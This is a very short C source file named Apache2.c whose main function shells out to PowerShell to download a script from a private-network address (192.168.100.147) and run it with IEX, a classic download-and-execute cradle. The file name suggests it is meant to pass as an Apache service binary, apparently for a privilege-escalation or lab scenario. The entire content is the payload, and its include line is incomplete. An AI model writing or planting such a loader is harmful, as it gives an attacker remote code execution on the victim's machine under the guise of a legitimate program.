/* Apache2.c */ #include main() { system("powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://192.168.100.147/ps.ps1.txt '))\""); return 0; }